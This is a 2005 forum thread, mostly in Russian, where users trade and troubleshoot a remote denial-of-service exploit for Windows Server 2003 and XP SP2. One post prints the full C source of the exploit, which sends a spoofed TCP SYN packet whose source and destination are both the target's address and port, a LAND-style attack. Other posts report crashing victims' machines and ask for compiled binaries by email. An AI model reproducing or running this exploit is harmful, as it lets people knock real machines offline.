Damian:
are you root?
are you root?
09.03.2005 17:16:57
Damian:
are you root? |
|
|
|
09.03.2005 21:28:10
After some changes, exploit compiled under FreeBSD 4.10.
But, under root ------------- > ./out IP 135 sendto() : Invalid argument ------------ Thanks in advance. |
|
|
|
09.03.2005 23:40:23
надо написать свой вариант... как напишу скажу
|
|
|
|
10.03.2005 00:46:58
guess:
dont blame compiler check the changes first. |
|
|
|
10.03.2005 12:09:22
check once again if you have permissions.
|
|
|
|
10.03.2005 14:57:02
чё за гон? ктонидь может дать ссылку на рабочий откомпилированый эксполит
|
|
|
|
10.03.2005 14:57:13
Поставил winpcap 3.1 b4 и попробывал запустить NewLand. Прогресс есть. Просит выбрать Device для атаки и начинает генирировать пакеты... генерирует, генерирует, генерирует... Ничего не происходит
Что качается bsd, то там все начительно лучше. У знакомого все заработало и у жертвы комп 100 % грузится. Он пользовался пуьличным первым сплоитом. |
|
|
|
10.03.2005 15:26:37
Нарисовал код под win32,кому нужны исходники,могу поделится,результаты тестов Win2k3:
пробал положит машину со всеми патчам,эксплоит не сработал кинул 1 пакет на Win2k3 безпатчей,на сек 10 загрузка проца 100%, кинул по одному пакету на 3 открытых порта,загрузка проца 100% на 30 секунд смысл по моему ясен код компилил под Visual Studio 2003 |
|
|
|
10.03.2005 15:33:51
Мой код не требует дополнительных либ и хидеров,
юзаю SOCK_RAW,компилится без проблем пишите кому надо jаvаscriрt:AddSmileyIcon([IMG] |
|
|
|
10.03.2005 16:57:31
ужастно срочно нужно скомпиленный, работающий сплойт под Вин... Если есть, плиз намыльте l33roy@mail.ru |
|||
|
|
10.03.2005 17:45:17
Да забыл сказать,сплоит работает тока на NT платформах
(т.к. юзаю SOCK_RAW) лично я пробал пускать под W2k3, на других платформах пускать не пробал,и за неимеючи таковых |
|
|
|
11.03.2005 02:00:06
не суди по себе... Парни, скиньте сорцы и бинарник под вынь 1ora@tut.by
|
|
|
|
11.03.2005 05:27:28
мне нужны под win32, мыльте plamiv@tut.by
|
|
|
|
11.03.2005 06:55:12
в инет типо не судьба выложить ? поделитесь че там у вас
у меня лично скомпилилось под бздю вот что: --------- #include <stdio.h> #include <ctype.h> #include <stdlib.h> #include <unistd.h> #include <sysexits.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> /* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja <dejan_@_levaja.com> , ©oded by __blf 2005 RusH Security Team , All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; } |
|
|
|
11.03.2005 06:57:08
кстати говорит
[aesgrs@sehsrth poc]$ ./windos 1.1.1.1 445 setsockopt: Bad file descriptor |
|
|
|
11.03.2005 09:23:28
А можно выложить творение Fatalа на паблик!
Кинуть людям ссылку, а то задолбаешся рассылать |
|
|
|
11.03.2005 09:43:01
Скинте и мне на мыло под win32 бинарник plz(NEKdfl@rambler.ru). [IMG]
А может кто-нить в инет теперь выложит [IMG] |
|
|
|
11.03.2005 12:15:35
Если нет рудно чкиньте кто нить откомпиленную версию. на Tih2004@mail.ru.
Заранее спасибо ! |
||||
|
|
|||